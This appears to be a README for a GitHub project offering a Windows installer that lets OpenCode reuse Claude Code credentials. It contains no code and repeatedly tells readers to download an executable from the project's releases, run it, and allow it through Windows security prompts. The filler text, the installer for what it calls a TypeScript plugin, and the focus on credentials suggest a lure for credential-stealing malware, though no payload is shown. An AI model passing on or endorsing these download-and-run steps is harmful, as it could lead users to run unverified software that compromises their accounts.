This app is meant to help OpenCode use your existing Claude Code credentials, so you do not need a separate login.
Go to:
https://github.com/osuma2662/opencode-claude-auth
Look for the latest version on the page. Open the release files for Windows.
Choose the Windows download file that matches your system. Save it to your computer.
Open the file you downloaded. If Windows asks for permission, choose to run it.
Follow the on-screen steps to use your current Claude Code credentials.
Start OpenCode after setup. The plugin will use your Claude Code sign-in.
This plugin connects OpenCode to your Claude Code account so you can:
- Use your existing Claude Code access
- Skip a separate app login
- Keep your setup in one place
- Start working faster
- Use the same auth flow you already know
This is for people who:
- Use OpenCode on Windows
- Already have Claude Code credentials
- Want one login path
- Prefer a simple setup
- Do not want extra account steps
Use a Windows PC with:
- Windows 10 or Windows 11
- A stable internet connection
- Enough disk space for the app files
- Permission to run downloaded apps
- An active Claude Code account
The plugin sits between OpenCode and Claude auth. It uses your existing Claude Code sign-in flow instead of asking you to create a new one.
That means:
- OpenCode asks for auth
- The plugin passes that request to Claude Code credentials
- Claude Code handles the sign-in
- OpenCode receives access through the same account
Visit the download page:
https://github.com/osuma2662/opencode-claude-auth
Pick a folder you can find again, such as Downloads or Desktop.
Double-click the downloaded Windows file.
If Windows asks for a security prompt, choose the option to run or allow the file.
Follow the prompts until the setup is done.
Open OpenCode and check that it uses your Claude Code credentials.
After setup, use it like this:
- Start OpenCode
- Sign in with your Claude Code account if asked
- Use OpenCode as normal
- Keep your Claude Code session active when needed
Typical files and parts of the project include:
- The plugin itself
- Windows setup files
- Auth handling for Claude Code
- TypeScript source files
- Configuration for OpenCode
You may see files such as:
.exe.msi.zip- release notes
- plugin config files
Choose the Windows file if more than one file appears.
Try these steps:
- Check that you opened the latest file
- Make sure Claude Code credentials are still active
- Close OpenCode and open it again
- Download the file again if it looks damaged
- Reboot Windows and try once more
Keep the setup simple:
- Use one download folder
- Remove old files after you finish
- Keep your Claude Code login ready
- Use the latest release
- Close other apps if the install stops
